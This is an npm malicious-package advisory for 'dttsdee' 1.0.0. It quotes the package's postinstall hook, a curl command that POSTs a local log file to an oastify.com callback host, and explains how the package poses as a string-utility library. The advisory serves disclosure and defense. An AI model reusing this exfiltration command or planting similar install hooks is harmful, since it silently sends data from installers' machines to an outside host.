npm · Malicious package advisory
Malwaredttsdee
MAL-2026-6462
Malicious code in dttsdee (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9) package.json declares a postinstall lifecycle script that runs automatically on `npm install`: `curl -X POST -d "$(cat /data/logs/monitor-2026-06-25.log)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data`. The hook reads a file from the installer's filesystem and POSTs its contents over cleartext HTTP to an attacker-controlled subdomain on oastify.com (Burp Suite's Collaborator out-of-band callback service, commonly used for data exfiltration and SSRF research). The package advertises itself as a string-utility library (`easy-string-kit` in source) but is published under the unrelated name `dttsdee` with empty author/repository/homepage/bugs metadata; the innocuous string-helper code in index.js is cover for the install-time exfiltration. The combination of generic placeholder metadata, mismatched name/internal-description, and an automatic OOB exfil beacon on a researcher/attacker callback domain is a throwaway malicious package (likely dependency-confusion PoC or active attack). ## Source: ossf-package-analysis (4c2da603726677a712bcd1e3ce798e5b3f2eed115827085596589c40613e9ad6) The OpenSSF Package Analysis project identified 'dttsdee' @ 1.0.0 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Compromised versions (1)
- 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.